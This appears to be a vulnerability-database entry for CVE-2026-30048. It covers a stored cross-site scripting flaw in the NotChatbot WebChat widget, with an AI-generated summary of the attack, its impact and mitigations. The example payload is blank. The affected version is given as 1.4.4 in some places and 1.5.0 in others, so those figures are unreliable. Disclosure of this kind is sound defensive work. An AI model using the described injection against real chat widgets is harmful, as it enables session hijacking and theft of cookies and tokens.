CVE-2026-30048
Description
A stored cross-site scripting (XSS) vulnerability exists in the NotChatbot WebChat widget thru 1.4.4. User-supplied input is not properly sanitized before being stored and rendered in the chat conversation history. This allows an attacker to inject arbitrary JavaScript code which is executed when the chat history is reloaded. The issue is reproducible across multiple independent implementations of the widget, indicating that the vulnerability resides in the product itself rather than in a specific website configuration.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
A stored XSS vulnerability in the NotChatbot WebChat widget through version 1.5.0 allows arbitrary JavaScript execution by injecting un-sanitized payloads into chat history.
Vulnerability
Overview A stored cross-site scripting (XSS) vulnerability exists in the NotChatbot WebChat widget, affecting versions up to and including 1.5.0. The root cause is that user-supplied input is not properly sanitized before being stored and later rendered in the chat conversation history. This allows an attacker to inject arbitrary HTML and JavaScript code, which is executed when the history is reloaded or viewed by another user [1][2][3]. The issue is reproducible across multiple independent implementations, indicating the vulnerability resides in the reusable WebChat component itself rather than in specific website configurations [1].
Attack
Vector and Exploitation An attacker can exploit this vulnerability by sending a crafted chat message containing a malicious payload, such as ``. The payload is stored on the server and executed in the victim's browser when the conversation history is rendered or reloaded. No special privileges or authentication are required to send messages; any user interacting with the widget can inject the payload [2][3]. The attack vector is straightforward: integrate the widget, send the malicious message, and trigger execution upon history reload [2].
Impact
Successful exploitation allows arbitrary JavaScript execution in the context of the victim's browser. This can lead to session hijacking, information disclosure (e.g., cookies, tokens), and potential account takeover depending on the application's context [2][3]. The impact is amplified because the widget is often embedded in multiple websites, making any site using an affected version potentially vulnerable [1].
Mitigation and
Remediation As of early 2026, the vendor has not released an official patch; the NVD record is not prioritized for enrichment [1]. A suggested fix involves properly sanitizing and escaping user input before rendering, using libraries like DOMPurify, and implementing a Content Security Policy (CSP) to prevent inline script execution [2][3]. Users are advised to temporarily disable the widget or apply output encoding until a patched version is available.
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
@developer.notchatbot/webchatnpm | <= 1.5.0 | — |
Affected products
1- Range: <=1.4.4
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
5News mentions
0No linked articles in our index yet.